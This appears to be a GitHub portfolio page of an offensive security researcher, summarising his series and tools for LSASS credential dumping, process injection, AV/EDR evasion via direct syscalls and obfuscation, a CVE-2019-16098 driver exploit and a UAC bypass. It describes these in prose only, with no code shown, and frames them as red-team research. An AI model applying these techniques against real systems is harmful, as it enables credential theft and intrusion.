Welcome to my portfolio, a hub for my cybersecurity series, blogs, and projects, organized for your insight.

Usman Sikander (a.k.a Offensive-Panda)

Offensive Security Researcher @ Cytomate

☠️ An InfoSec Enthusiast: constantly seeking knowledge. I enjoy the Purple 💜 but more in love with Red ❤️.
🔭 Currently Focused On: Adversary Emulation, Red Teaming, Malware Development, and Breach & Attack Simulation.
🤝 Passionate About: Adversary Emulation, Security Controls Validation, Red Team Operations, and Proactive Threat Hunting.
⚡ Fun Fact: I believe I am funny!
📝 Articles and Research: I regularly write on Medium.

Explore My Articles

Cybersecurity series

Defense Evasion Series

GIF 1

Malware Analysis Series

GIF 2

Process Injection Series

GIF 3

Series (GitHub Pages)	Details
Advanced Evasion Techniques	This comprehensive repository is designed for cybersecurity enthusiasts, researchers, and professionals looking to enhance their skills in malware development, offensive security, and advanced security defenses.
Malware Analysis	This central repository offers valuable resources for professionals and researchers focused on analyzing and understanding different types of malware, helping to advance malware research skills.
Process Injection Techniques	This series explores various process injection techniques used by adversaries, offering in-depth knowledge for those seeking expertise in offensive security techniques and strategies.

Pinned projects

RWX MEMORY HUNT AND INJECTION DV

Abusing Windows fork API and OneDrive.exe process to inject the malicious shellcode without allocating new RWX memory region. This technique is finding RWX region in already running processes in this case OneDrive.exe and Write shellcode into that region and execute it without calling VirtualProtect, VirtualAllocEx, VirtualAlloc.

Shadow Dumper Tool

Shadow Dumper is a powerful tool used to dump LSASS (Local Security Authority Subsystem Service) memory, often needed in penetration testing and red teaming activities. It offers flexible options to users and uses multiple advanced techniques to dump memory, allowing to access sensitive data in LSASS memory.

🔴 C++ 🟢 C 🟡 Assembly

Lsass Memory Dumping (D3MPSEC)

"D3MPSEC" is a memory dumping tool designed to extract memory dump from Lsass process using various techniques, including direct system calls, randomized procedures, and prototype name obfuscation. Its primary purpose is to bypass both static and dynamic analysis techniques commonly employed by security measures.

🔴 C++ 🟢 C 🟡 Assembly

Lsass Reflect Dumping

This tool leverages the Process Forking technique using the RtlCreateProcessReflection API to clone the lsass.exe process. Once the clone is created, it utilizes MINIDUMP_CALLBACK_INFORMATION callbacks to generate a memory dump of the cloned process. Mimikatz and Pypykatz can be used offline to parse and extract the hashes.

Defense Evasion Techniques

This comprehensive and central repository is designed for cybersecurity enthusiasts, researchers, and professionals seeking to stay ahead in the field. It provides a valuable resource for those dedicated to improving their skills in malware development, offensive security, and security defenses.

🔴 C++ 🟢 C 🟡 Assembly 🟣 Batch 🟠 C#

Process Injection Techniques

This comprehensive process injection series is crafted for cybersecurity enthusiasts, researchers, and professionals who aim to stay at the forefront of the field. It serves as a central repository of knowledge, offering in-depth exploration of various process injection techniques used by adversaries.

🔴 C++ 🟢 C 🟡 Assembly 🟣 Batch

NT-AUTHORITY-SYSTEM-CONTEXT-RTCORE

This exploit rebuilds and exploit the CVE-2019-16098 which is in driver Micro-Star MSI Afterburner 4.6.2.15658 (aka RTCore64.sys and RTCore32.sys) allows any authenticated user to read and write to arbitrary memory, I/O ports, and MSRs. Instead of hardcoded base address of Ntoskrnl.exe, I calculated it dynamically and recalculated all offsets for new version of windows.

WPM-MAJIC-ENTRY-POINT-INJECTION

This exploit is utilising AddressOfEntryPoint of process which is RX and using WriteProcessMemory internal magic to change the permission and write the shellcode. Exploit also using direct syscalls to bypass user-mode hooking of AV/EDRs. This technique is avoiding the usage of VirtualAlloc, VirtualProtect APIs directly inside the code. The working of VirtualProtect will be covered by WPM magic.

🔴 C++ 🟢 C 🟡 Assembly

.NET_PROFILER_DLL_LOADING

.NET profiler DLL loading can be abused to make a legit .NET application load a malicious DLL using environment variables. This exploit is loading a malicious DLL using Task Scheduler (MMC) to bypass UAC and getting admin privileges.

🔴 C++ 🟢 C

PEB_WALK_AND_API_OBFUSCATION_INJECTION

This exploit use PEB walk technique to resolve API calls dynamically and obfuscate all API calls to perform process injection. These technqies will help to bypass static analysis of AV/EDR solutions.

Dirty Vanity New (DV_NEW)

This is the combination of multiple evasion techniques. It is using direct syscalls to bypass user-mode EDR hooking and also to avoid static detection of syscalls instruction in stub I am using egg hunt technique.

🔴 C++ 🟢 C 🟡 Assembly

Malware Analysis

This central repository is crafted for cybersecurity enthusiasts, researchers, and professionals aiming to advance their skills. It offers valuable resources for those focused on analyzing and understanding different types of malware.

🔴 C++ 🟢 C 🟡 Assembly 🟣 Batch 🟠 C#

GitHub stats

GitHub Stats

Top Languages

Connect with me

Languages and tools